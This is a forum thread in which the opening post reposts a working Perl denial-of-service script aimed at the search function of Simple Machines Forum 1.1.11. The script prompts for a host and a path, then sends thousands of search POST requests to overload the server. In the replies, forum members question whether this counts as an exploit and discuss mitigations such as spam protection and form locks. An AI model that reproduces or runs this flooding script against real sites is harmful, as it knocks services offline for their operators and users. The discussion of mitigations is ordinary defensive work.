[Exploit smf 1.1.11] Multiple search DDOS

Started by KinG-InFeT, September 06, 2010, 03:52:18 AM

Previous topic - Next topic
Print
Go Down Pages1
User actions

KinG-InFeT

September 06, 2010, 03:52:18 AM
Code Select
######################################



[+] Exploit Title: Simple Machines Forums (SMF 1.1.11) Multiple Search DDOS



[+] Date: 2010-02-11



[+] Author: Ashiyane Digital Security Members (Cair3x)



[+] Software Link: http://www.simplemachines.org/



[+] Version: 1.1.11 And All Version



[+] Tested on: All



######################################

#!/usr/bin/perl

use IO::Socket;

print q{

##################################################

# He Smf Full Ver ha ha ha  Multiple Search DOS #

# Tested on SMF 1.1.11 - 1.1.11 #

# Created By Cair3x ! ;) #

##################################################



[ Script ]



};

$rand=rand(10);

print "Forum Host: ";

$serv = <stdin>;

chop ($serv);

print "Forum Path: ";

$path = <stdin>;

chop ($path);

for ($i=0; $i<9999; $i++)

{

$postit = "search=Cair3x+Cairex+Cair3x+Cair3x+Of+Iran+$x+ &search_terms=any&search_author=&search_forum=-1&search_time =0&search_fields=msgonly&search_cat=-1&sort_by=0&sort_dir=AS C&show_results=posts&return_chars=200";



$lrg = length $postit;



my $sock = new IO::Socket::INET (

PeerAddr => "$serv",

PeerPort => "80",

Proto => "tcp",

);

die "nThe Socket Can't Connect To The Desired Host or the Host is MayBe DoSed: $!n" unless $sock;



print $sock "POST $path"."index.php?action=search2 HTTP/1.1n";

print $sock "Host: $servn";

print $sock "Accept: text/_xml,application/_xml,application/xhtml+_xml,text/html;q=0 .9,text/plain;q=0.8,image/png,*/*;q=0.5n";

print $sock "Referer: $servn";

print $sock "Accept-Language: en-usn";

print $sock "Content-Type: application/x-www-form-urlencodedn";

print $sock "Accept-Encoding: gzip, deflaten";

print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4n";

print $sock "Connection: Keep-Aliven";

print $sock "Cache-Control: no-cachen";

print $sock "Content-Length: $lrgnn";

print $sock "$postitn";

close($sock);



## Print a "+" for every loop

syswrite STDOUT, "+";

}

print "Forum Be Fuke Raft. Test Konid ...n";



[ / Script ]



######################################



BY : Cair3x [[email protected]]



Web Site : Ashiyane.org



Forum : Http://Ashiyane.org/forums/



[+] Greetz to All Ashiyane Digital Security Member (And Virangar Good Frinds)



######################################

fix?

Oya

#2
September 08, 2010, 09:33:32 AM
cant fix this

this applies to any systm that does search when their isnt lots of servers to handel the load

Kindred

#3
September 08, 2010, 11:25:30 AM
I am not sure if this counts as an "exploit", especially since the same sort of crap could be done by script to just about ANY site running a script with db search capability....
Слaва
Украинi

Please do not PM, IM or Email me with support questions.  You will get better and faster responses in the support boards.  Thank you.

"Loki is not evil, although he is certainly not a force for good. Loki is... complicated."

emanuele

#4
November 13, 2011, 06:02:40 PM
Would it make sense to have a spamProtection like in SMF2?


Take a peek at what I'm doing! ;D



Hai bisogno di supporto in Italiano?

Aiutateci ad aiutarvi: spiegate bene il vostro problema: no, "non funziona" non è una spiegazione!!
1) Cosa fai,
2) cosa ti aspetti,
3) cosa ottieni.

Trekkie101

#5
August 18, 2012, 07:42:11 AM
SMF 2.0 stops this, also 1.1 can stop it with the form locks in the DB for high load.

Maybe just add a load average for searching in the default DB schema?

Else natural progression of the software has eradicated this, no longer a bug?
Print
Go Up Pages1
User actions
Advertisement: